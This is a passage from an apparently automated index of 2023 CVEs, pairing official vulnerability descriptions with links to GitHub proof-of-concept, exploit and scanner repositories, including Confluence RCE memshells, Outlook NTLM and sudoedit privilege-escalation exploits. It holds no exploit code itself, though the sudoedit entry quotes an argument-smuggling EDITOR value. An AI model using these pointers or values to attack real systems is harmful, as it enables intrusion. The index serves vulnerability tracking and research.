[3yujw7njai/CVE-2023-21716-POC](https://github.com/3yujw7njai/CVE-2023-21716-POC) +- [hv0l/CVE-2023-21716_exploit](https://github.com/hv0l/CVE-2023-21716_exploit) +- [JMousqueton/CVE-2023-21716](https://github.com/JMousqueton/CVE-2023-21716) +- [Lord-of-the-IoT/CVE-2023-21716](https://github.com/Lord-of-the-IoT/CVE-2023-21716) +- [MojithaR/CVE-2023-21716-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-21716-EXPLOIT.py) +- [RonF98/CVE-2023-21716-POC](https://github.com/RonF98/CVE-2023-21716-POC) +- [n0s3ns33/poc-cve-2023-21716](https://github.com/n0s3ns33/poc-cve-2023-21716) + +### CVE-2023-21739 (2023-01-10) + +Windows Bluetooth Driver Elevation of Privilege Vulnerability + + +- [gmh5225/CVE-2023-21739](https://github.com/gmh5225/CVE-2023-21739) + +### CVE-2023-21742 (2023-01-10) + +Microsoft SharePoint Server Remote Code Execution Vulnerability + + +- [ohnonoyesyes/CVE-2023-21742](https://github.com/ohnonoyesyes/CVE-2023-21742) + +### CVE-2023-21746 (2023-01-10) + +Windows NTLM Elevation of Privilege Vulnerability + + +- [Muhammad-Ali007/LocalPotato_CVE-2023-21746](https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746) + +### CVE-2023-21752 (2023-01-10) + +Windows Backup Service Elevation of Privilege Vulnerability + + +- [Wh04m1001/CVE-2023-21752](https://github.com/Wh04m1001/CVE-2023-21752) +- [yosef0x01/CVE-2023-21752](https://github.com/yosef0x01/CVE-2023-21752) + +### CVE-2023-21766 (2023-01-10) + +Windows Overlay Filter Information Disclosure Vulnerability + + +- [Y3A/cve-2023-21766](https://github.com/Y3A/cve-2023-21766) + +### CVE-2023-21768 (2023-01-10) + +Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability + + +- [chompie1337/Windows_LPE_AFD_CVE-2023-21768](https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768) +- [cl4ym0re/cve-2023-21768-compiled](https://github.com/cl4ym0re/cve-2023-21768-compiled) +- [SamuelTulach/nullmap](https://github.com/SamuelTulach/nullmap) +- [Malwareman007/CVE-2023-21768](https://github.com/Malwareman007/CVE-2023-21768) +- [HKxiaoli/Windows_AFD_LPE_CVE-2023-21768](https://github.com/HKxiaoli/Windows_AFD_LPE_CVE-2023-21768) +- [3yujw7njai/CVE-2023-21768-POC](https://github.com/3yujw7njai/CVE-2023-21768-POC) +- [h1bAna/CVE-2023-21768](https://github.com/h1bAna/CVE-2023-21768) +- [zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit](https://github.com/zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit) +- [Rosayxy/Recreate-cve-2023-21768](https://github.com/Rosayxy/Recreate-cve-2023-21768) +- [ldrx30/CVE-2023-21768](https://github.com/ldrx30/CVE-2023-21768) +- [xboxoneresearch/CVE-2023-21768-dotnet](https://github.com/xboxoneresearch/CVE-2023-21768-dotnet) + +### CVE-2023-21823 (2023-02-14) + +Windows Graphics Component Remote Code Execution Vulnerability + + +- [Elizarfish/CVE-2023-21823](https://github.com/Elizarfish/CVE-2023-21823) + +### CVE-2023-21837 (2023-01-17) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [hktalent/CVE-2023-21837](https://github.com/hktalent/CVE-2023-21837) + +### CVE-2023-21839 (2023-01-17) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [DXask88MA/Weblogic-CVE-2023-21839](https://github.com/DXask88MA/Weblogic-CVE-2023-21839) +- [ASkyeye/CVE-2023-21839](https://github.com/ASkyeye/CVE-2023-21839) +- [Firebasky/CVE-2023-21839](https://github.com/Firebasky/CVE-2023-21839) +- [houqe/POC_CVE-2023-21839](https://github.com/houqe/POC_CVE-2023-21839) +- [kw3h4/CVE-2023-21839-metasploit-scanner](https://github.com/kw3h4/CVE-2023-21839-metasploit-scanner) +- [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test) +- [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931) + +### CVE-2023-21887 (2023-01-17) + +Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: GIS). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). + + +- [zwxxb/CVE-2023-21887](https://github.com/zwxxb/CVE-2023-21887) + +### CVE-2023-21931 (2023-04-18) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [TimeSHU/weblogic_CVE-2023-21931_POC-EXP](https://github.com/TimeSHU/weblogic_CVE-2023-21931_POC-EXP) + +### CVE-2023-21939 (2023-04-18) + +Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). + + +- [Y4Sec-Team/CVE-2023-21939](https://github.com/Y4Sec-Team/CVE-2023-21939) + +### CVE-2023-21971 (2023-04-18) + +Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.32 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors as well as unauthorized update, insert or delete access to some of MySQL Connectors accessible data and unauthorized read access to a subset of MySQL Connectors accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:H). + + +- [Avento/CVE-2023-21971_Analysis](https://github.com/Avento/CVE-2023-21971_Analysis) + +### CVE-2023-21987 (2023-04-18) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.44 and Prior to 7.0.8. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H). + + +- [chunzhennn/cve-2023-21987-poc](https://github.com/chunzhennn/cve-2023-21987-poc) + +### CVE-2023-22074 (2023-10-17) + +Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Supported versions that are affected are 19.3-19.20 and 21.3-21.11. Easily exploitable vulnerability allows high privileged attacker having Create Session, Select Any Dictionary privilege with network access via Oracle Net to compromise Oracle Database Sharding. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Database Sharding. CVSS 3.1 Base Score 2.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:L). + + +- [emad-almousa/CVE-2023-22074](https://github.com/emad-almousa/CVE-2023-22074) + +### CVE-2023-22098 (2023-10-17) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.12. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: Only applicable to 7.0.x platform. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). + + +- [Diego-AltF4/CVE-2023-22098](https://github.com/Diego-AltF4/CVE-2023-22098) + +### CVE-2023-22432 (2023-03-05) + +Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack. + + +- [aeyesec/CVE-2023-22432](https://github.com/aeyesec/CVE-2023-22432) + +### CVE-2023-22490 (2023-02-14) + +Git is a revision control system. Using a specially-crafted repository, Git prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8 can be tricked into using its local clone optimization even when using a non-local transport. Though Git will abort local clones whose source `$GIT_DIR/objects` directory contains symbolic links, the `objects` directory itself may still be a symbolic link. These two may be combined to include arbitrary files based on known paths on the victim's filesystem within the malicious repository's working copy, allowing for data exfiltration in a similar manner as CVE-2022-39253.\n\nA fix has been prepared and will appear in v2.39.2 v2.38.4 v2.37.6 v2.36.5 v2.35.7 v2.34.7 v2.33.7 v2.32.6, v2.31.7 and v2.30.8. If upgrading is impractical, two short-term workarounds are available. Avoid cloning repositories from untrusted sources with `--recurse-submodules`. Instead, consider cloning repositories without recursively cloning their submodules, and instead run `git submodule update` at each layer. Before doing so, inspect each new `.gitmodules` file to ensure that it does not contain suspicious module URLs. + + +- [smash8tap/CVE-2023-22490_PoC](https://github.com/smash8tap/CVE-2023-22490_PoC) + +### CVE-2023-22515 (2023-10-04) + +Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. \r\n\r\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue. + + +- [ErikWynter/CVE-2023-22515-Scan](https://github.com/ErikWynter/CVE-2023-22515-Scan) +- [j3seer/CVE-2023-22515-POC](https://github.com/j3seer/CVE-2023-22515-POC) +- [Chocapikk/CVE-2023-22515](https://github.com/Chocapikk/CVE-2023-22515) +- [ad-calcium/CVE-2023-22515](https://github.com/ad-calcium/CVE-2023-22515) +- [kh4sh3i/CVE-2023-22515](https://github.com/kh4sh3i/CVE-2023-22515) +- [sincere9/CVE-2023-22515](https://github.com/sincere9/CVE-2023-22515) +- [Le1a/CVE-2023-22515](https://github.com/Le1a/CVE-2023-22515) +- [Vulnmachines/confluence-cve-2023-22515](https://github.com/Vulnmachines/confluence-cve-2023-22515) +- [iveresk/CVE-2023-22515](https://github.com/iveresk/CVE-2023-22515) +- [youcannotseemeagain/CVE-2023-22515_RCE](https://github.com/youcannotseemeagain/CVE-2023-22515_RCE) +- [DsaHen/cve-2023-22515-exp](https://github.com/DsaHen/cve-2023-22515-exp) +- [joaoviictorti/CVE-2023-22515](https://github.com/joaoviictorti/CVE-2023-22515) +- [C1ph3rX13/CVE-2023-22515](https://github.com/C1ph3rX13/CVE-2023-22515) +- [AIex-3/confluence-hack](https://github.com/AIex-3/confluence-hack) +- [LucasPDiniz/CVE-2023-22515](https://github.com/LucasPDiniz/CVE-2023-22515) +- [aaaademo/Confluence-EvilJar](https://github.com/aaaademo/Confluence-EvilJar) +- [edsonjt81/CVE-2023-22515-Scan.](https://github.com/edsonjt81/CVE-2023-22515-Scan.) +- [INTfinityConsulting/cve-2023-22515](https://github.com/INTfinityConsulting/cve-2023-22515) +- [CalegariMindSec/Exploit-CVE-2023-22515](https://github.com/CalegariMindSec/Exploit-CVE-2023-22515) +- [rxerium/CVE-2023-22515](https://github.com/rxerium/CVE-2023-22515) +- [fyx1t/NSE--CVE-2023-22515](https://github.com/fyx1t/NSE--CVE-2023-22515) +- [s1d6point7bugcrowd/CVE-2023-22515-check](https://github.com/s1d6point7bugcrowd/CVE-2023-22515-check) +- [xorbbo/cve-2023-22515](https://github.com/xorbbo/cve-2023-22515) +- [spareack/CVE-2023-22515-NSE](https://github.com/spareack/CVE-2023-22515-NSE) +- [Onedy1703/CVE-2023-22515](https://github.com/Onedy1703/CVE-2023-22515) + +### CVE-2023-22518 (2023-10-31) + +All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to - but not limited to - full loss of confidentiality, integrity and availability. \n\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue. + + +- [ForceFledgling/CVE-2023-22518](https://github.com/ForceFledgling/CVE-2023-22518) +- [davidfortytwo/CVE-2023-22518](https://github.com/davidfortytwo/CVE-2023-22518) +- [RevoltSecurities/CVE-2023-22518](https://github.com/RevoltSecurities/CVE-2023-22518) +- [0x0d3ad/CVE-2023-22518](https://github.com/0x0d3ad/CVE-2023-22518) +- [C1ph3rX13/CVE-2023-22518](https://github.com/C1ph3rX13/CVE-2023-22518) +- [bibo318/CVE-2023-22518](https://github.com/bibo318/CVE-2023-22518) +- [Lilly-dox/Exploit-CVE-2023-22518](https://github.com/Lilly-dox/Exploit-CVE-2023-22518) + +### CVE-2023-22524 (2023-12-06) + +Certain versions of the Atlassian Companion App for MacOS were affected by a remote code execution vulnerability. An attacker could utilize WebSockets to bypass Atlassian Companion’s blocklist and MacOS Gatekeeper to allow execution of code. + + +- [imperva/CVE-2023-22524](https://github.com/imperva/CVE-2023-22524) +- [ron-imperva/CVE-2023-22524](https://github.com/ron-imperva/CVE-2023-22524) + +### CVE-2023-22527 (2024-01-16) + +A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\n\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. + + +- [Avento/CVE-2023-22527_Confluence_RCE](https://github.com/Avento/CVE-2023-22527_Confluence_RCE) +- [Sudistark/patch-diff-CVE-2023-22527](https://github.com/Sudistark/patch-diff-CVE-2023-22527) +- [ga0we1/CVE-2023-22527_Confluence_RCE](https://github.com/ga0we1/CVE-2023-22527_Confluence_RCE) +- [Drun1baby/CVE-2023-22527](https://github.com/Drun1baby/CVE-2023-22527) +- [cleverg0d/CVE-2023-22527](https://github.com/cleverg0d/CVE-2023-22527) +- [thanhlam-attt/CVE-2023-22527](https://github.com/thanhlam-attt/CVE-2023-22527) +- [Manh130902/CVE-2023-22527-POC](https://github.com/Manh130902/CVE-2023-22527-POC) +- [VNCERT-CC/CVE-2023-22527-confluence](https://github.com/VNCERT-CC/CVE-2023-22527-confluence) +- [Vozec/CVE-2023-22527](https://github.com/Vozec/CVE-2023-22527) +- [C1ph3rX13/CVE-2023-22527](https://github.com/C1ph3rX13/CVE-2023-22527) +- [Niuwoo/CVE-2023-22527](https://github.com/Niuwoo/CVE-2023-22527) +- [Chocapikk/CVE-2023-22527](https://github.com/Chocapikk/CVE-2023-22527) +- [RevoltSecurities/CVE-2023-22527](https://github.com/RevoltSecurities/CVE-2023-22527) +- [yoryio/CVE-2023-22527](https://github.com/yoryio/CVE-2023-22527) +- [Privia-Security/CVE-2023-22527](https://github.com/Privia-Security/CVE-2023-22527) +- [MaanVader/CVE-2023-22527-POC](https://github.com/MaanVader/CVE-2023-22527-POC) +- [adminlove520/CVE-2023-22527](https://github.com/adminlove520/CVE-2023-22527) +- [YongYe-Security/CVE-2023-22527](https://github.com/YongYe-Security/CVE-2023-22527) +- [Boogipop/CVE-2023-22527-Godzilla-MEMSHELL](https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL) +- [M0untainShley/CVE-2023-22527-MEMSHELL](https://github.com/M0untainShley/CVE-2023-22527-MEMSHELL) +- [vulncheck-oss/cve-2023-22527](https://github.com/vulncheck-oss/cve-2023-22527) +- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE) +- [kh4sh3i/CVE-2023-22527](https://github.com/kh4sh3i/CVE-2023-22527) +- [AxthonyV/CVE-2023-22527](https://github.com/AxthonyV/CVE-2023-22527) + +### CVE-2023-22551 (2023-01-01) + +The FTP (aka "Implementation of a simple FTP client and server") project through 96c1a35 allows remote attackers to cause a denial of service (memory consumption) by engaging in client activity, such as establishing and then terminating a connection. This occurs because malloc is used but free is not. + + +- [viswagb/CVE-2023-22551](https://github.com/viswagb/CVE-2023-22551) + +### CVE-2023-22621 (2023-04-19) + +Strapi through 4.5.5 allows authenticated Server-Side Template Injection (SSTI) that can be exploited to execute arbitrary code on the server. A remote attacker with access to the Strapi admin panel can inject a crafted payload that executes code on the server into an email template that bypasses the validation checks that should prevent code execution. + + +- [sofianeelhor/CVE-2023-22621-POC](https://github.com/sofianeelhor/CVE-2023-22621-POC) + +### CVE-2023-22622 (2023-01-05) + +WordPress through 6.1.1 depends on unpredictable client visits to cause wp-cron.php execution and the resulting security updates, and the source code describes "the scenario where a site may not receive enough visits to execute scheduled tasks in a timely manner," but neither the installation guide nor the security guide mentions this default behavior, or alerts the user about security risks on installations with very few visits. + + +- [michael-david-fry/CVE-2023-22622](https://github.com/michael-david-fry/CVE-2023-22622) + +### CVE-2023-22726 (2023-01-20) + +act is a project which allows for local running of github actions. The artifact server that stores artifacts from Github Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a Github Action. This issue may lead to privilege escalation. The /upload endpoint is vulnerable to path traversal as filepath is user controlled, and ultimately flows into os.Mkdir and os.Open. The /artifact endpoint is vulnerable to path traversal as the path is variable is user controlled, and the specified file is ultimately returned by the server. This has been addressed in version 0.2.40. Users are advised to upgrade. Users unable to upgrade may, during implementation of Open and OpenAtEnd for FS, ensure to use ValidPath() to check against path traversal or clean the user-provided paths manually. + + +- [ProxyPog/POC-CVE-2023-22726](https://github.com/ProxyPog/POC-CVE-2023-22726) + +### CVE-2023-22809 (2023-01-18) + +In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value. + + +- [n3m1sys/CVE-2023-22809-sudoedit-privesc](https://github.com/n3m1sys/CVE-2023-22809-sudoedit-privesc) +- [M4fiaB0y/CVE-2023-22809](https://github.com/M4fiaB0y/CVE-2023-22809) +- [3yujw7njai/CVE-2023-22809-sudo-POC](https://github.com/3yujw7njai/CVE-2023-22809-sudo-POC) +- [hello4r1end/patch_CVE-2023-22809](https://github.com/hello4r1end/patch_CVE-2023-22809) +- [Chan9Yan9/CVE-2023-22809](https://github.com/Chan9Yan9/CVE-2023-22809) +- [pashayogi/CVE-2023-22809](https://github.com/pashayogi/CVE-2023-22809) +- [asepsaepdin/CVE-2023-22809](https://github.com/asepsaepdin/CVE-2023-22809) +- [Toothless5143/CVE-2023-22809](https://github.com/Toothless5143/CVE-2023-22809) +- [AntiVlad/CVE-2023-22809](https://github.com/AntiVlad/CVE-2023-22809) +- [laxmiyamkolu/SUDO-privilege-escalation](https://github.com/laxmiyamkolu/SUDO-privilege-escalation) +- [D0rDa4aN919/CVE-2023-22809-Exploiter](https://github.com/D0rDa4aN919/CVE-2023-22809-Exploiter) + +### CVE-2023-22855 (2023-02-15) + +Kardex Mlog MCC 5.7.12+0-a203c2a213-master allows remote code execution. It spawns a web interface listening on port 8088. A user-controllable path is handed to a path-concatenation method (Path.Combine from .NET) without proper sanitisation. This yields the possibility of including local files, as well as remote files on SMB shares. If one provides a file with the extension .t4, it is rendered with the .NET templating engine mono/t4, which can execute code. + + +- [vianic/CVE-2023-22855](https://github.com/vianic/CVE-2023-22855) + +### CVE-2023-22884 (2023-01-21) + +Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider.This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0.\n\n + + +- [jakabakos/CVE-2023-22884-Airflow-SQLi](https://github.com/jakabakos/CVE-2023-22884-Airflow-SQLi) + +### CVE-2023-22894 (2023-04-19) + +Strapi through 4.5.5 allows attackers (with access to the admin panel) to discover sensitive user details by exploiting the query filter. The attacker can filter users by columns that contain sensitive information and infer a value from API responses. If the attacker has super admin access, then this can be exploited to discover the password hash and password reset token of all users. If the attacker has admin panel access to an account with permission to access the username and email of API users with a lower privileged role (e.g., Editor or Author), then this can be exploited to discover sensitive information for all API users but not other admin accounts. + + +- [Saboor-Hakimi/CVE-2023-22894](https://github.com/Saboor-Hakimi/CVE-2023-22894) + +### CVE-2023-22906 (2023-07-03) + +Hero Qubo HCD01_02_V1.38_20220125 devices allow TELNET access with root privileges by default, without a password. + + +- [nonamecoder/CVE-2023-22906](https://github.com/nonamecoder/CVE-2023-22906) + +### CVE-2023-22941 (2023-02-14) + +In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, an improperly-formatted ‘INGEST_EVAL’ parameter in a Field Transformation crashes the Splunk daemon (splunkd). + + +- [eduardosantos1989/CVE-2023-22941](https://github.com/eduardosantos1989/CVE-2023-22941) + +### CVE-2023-22960 (2023-01-23) + +Lexmark products through 2023-01-10 have Improper Control of Interaction Frequency. + + +- [t3l3machus/CVE-2023-22960](https://github.com/t3l3machus/CVE-2023-22960) + +### CVE-2023-22974 (2023-02-22) + +A Path Traversal in setup.php in OpenEMR < 7.0.0 allows remote unauthenticated users to read arbitrary files by controlling a connection to an attacker-controlled MySQL server. + + +- [gbrsh/CVE-2023-22974](https://github.com/gbrsh/CVE-2023-22974) + +### CVE-2023-23138 +- [OmarAtallahh/CVE-2023-23138](https://github.com/OmarAtallahh/CVE-2023-23138) + +### CVE-2023-23169 (2023-05-12) + +Synapsoft pdfocus 1.17 is vulnerable to local file inclusion and server-side request forgery Directory Traversal. + + +- [S4nshine/CVE-2023-23169](https://github.com/S4nshine/CVE-2023-23169) + +### CVE-2023-23192 (2023-03-23) + +IS Decisions UserLock MFA 11.01 is vulnerable to authentication bypass using scheduled task. + + +- [pinarsadioglu/CVE-2023-23192](https://github.com/pinarsadioglu/CVE-2023-23192) +- [Penkyzduyi/CVE-2023-23192](https://github.com/Penkyzduyi/CVE-2023-23192) + +### CVE-2023-23279 (2023-02-17) + +Canteen Management System 1.0 is vulnerable to SQL Injection via /php_action/getOrderReport.php. + + +- [tuannq2299/CVE-2023-23279](https://github.com/tuannq2299/CVE-2023-23279) + +### CVE-2023-23333 (2023-02-06) + +There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php. + + +- [Timorlover/CVE-2023-23333](https://github.com/Timorlover/CVE-2023-23333) +- [Mr-xn/CVE-2023-23333](https://github.com/Mr-xn/CVE-2023-23333) +- [emanueldosreis/nmap-CVE-2023-23333-exploit](https://github.com/emanueldosreis/nmap-CVE-2023-23333-exploit) + +### CVE-2023-23388 (2023-03-14) + +Windows Bluetooth Driver Elevation of Privilege Vulnerability + + +- [ynwarcs/CVE-2023-23388](https://github.com/ynwarcs/CVE-2023-23388) + +### CVE-2023-23396 (2023-03-14) + +Microsoft Excel Denial of Service Vulnerability + + +- [LucaBarile/CVE-2023-23396](https://github.com/LucaBarile/CVE-2023-23396) + +### CVE-2023-23397 (2023-03-14) + +Microsoft Outlook Elevation of Privilege Vulnerability + + +- [sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY](https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY) +- [j0eyv/CVE-2023-23397](https://github.com/j0eyv/CVE-2023-23397) +- [alicangnll/CVE-2023-23397](https://github.com/alicangnll/CVE-2023-23397) +- [grn-bogo/CVE-2023-23397](https://github.com/grn-bogo/CVE-2023-23397) +- [ka7ana/CVE-2023-23397](https://github.com/ka7ana/CVE-2023-23397) +- [api0cradle/CVE-2023-23397-POC-Powershell](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell) +- [im007/CVE-2023-23397](https://github.com/im007/CVE-2023-23397) +- [cleverg0d/CVE-2023-23397-PoC-PowerShell](https://github.com/cleverg0d/CVE-2023-23397-PoC-PowerShell) +- [ahmedkhlief/CVE-2023-23397-POC](https://github.com/ahmedkhlief/CVE-2023-23397-POC) +- [BillSkiCO/CVE-2023-23397_EXPLOIT](https://github.com/BillSkiCO/CVE-2023-23397_EXPLOIT) +- [djackreuter/CVE-2023-23397-PoC](https://github.com/djackreuter/CVE-2023-23397-PoC) +- [moneertv/CVE-2023-23397](https://github.com/moneertv/CVE-2023-23397) +- [ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook](https://github.com/ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook) +- [Trackflaw/CVE-2023-23397](https://github.com/Trackflaw/CVE-2023-23397) +- [SecCTechs/CVE-2023-23397](https://github.com/SecCTechs/CVE-2023-23397) +- [tiepologian/CVE-2023-23397](https://github.com/tiepologian/CVE-2023-23397) +- [BronzeBee/cve-2023-23397](https://github.com/BronzeBee/cve-2023-23397) +- [shaolinsec/CVE-2023-23397](https://github.com/shaolinsec/CVE-2023-23397) +- [Cyb3rMaddy/CVE-2023-23397-Report](https://github.com/Cyb3rMaddy/CVE-2023-23397-Report) +- [Zeppperoni/CVE-2023-23397-Patch](https://github.com/Zeppperoni/CVE-2023-23397-Patch) +- [jacquesquail/CVE-2023-23397](https://github.com/jacquesquail/CVE-2023-23397) +- [3yujw7njai/CVE-2023-23397-POC](https://github.com/3yujw7njai/CVE-2023-23397-POC) +- [vlad-a-man/CVE-2023-23397](https://github.com/vlad-a-man/CVE-2023-23397) +- [Muhammad-Ali007/OutlookNTLM_CVE-2023-23397](https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397) +- [Pushkarup/CVE-2023-23397](https://github.com/Pushkarup/CVE-2023-23397) +- [ducnorth2712/CVE-2023-23397](https://github.com/ducnorth2712/CVE-2023-23397) +- [sarsaeroth/CVE-2023-23397-POC](https://github.com/sarsaeroth/CVE-2023-23397-POC) +- [TheUnknownSoul/CVE-2023-23397-PoW](https://github.com/TheUnknownSoul/CVE-2023-23397-PoW) +- [Symbolexe/CVE-2023-23397](https://github.com/Symbolexe/CVE-2023-23397) + +### CVE-2023-23488 (2023-01-20) + +The Paid Memberships Pro WordPress Plugin, version < 2.9.8, is affected by an unauthenticated SQL injection vulnerability in the 'code' parameter of the '/pmpro/v1/order' REST route. + + +- [long-rookie/CVE-2023-23488-PoC](https://github.com/long-rookie/CVE-2023-23488-PoC) +- [cybfar/CVE-2023-23488-pmpro-2.8](https://github.com/cybfar/CVE-2023-23488-pmpro-2.8) + +### CVE-2023-23531 (2023-02-27) + +The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.2, iOS 16.3 and iPadOS 16.3. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges. + + +- [DarthOCE/MonkeyJB](https://github.com/DarthOCE/MonkeyJB) + +### CVE-2023-23583 (2023-11-14) + +Sequence of processor instructions leads to unexpected behavior for some Intel(R) Processors may allow an authenticated user to potentially enable escalation of privilege and/or information disclosure and/or denial of service via local access. + + +- 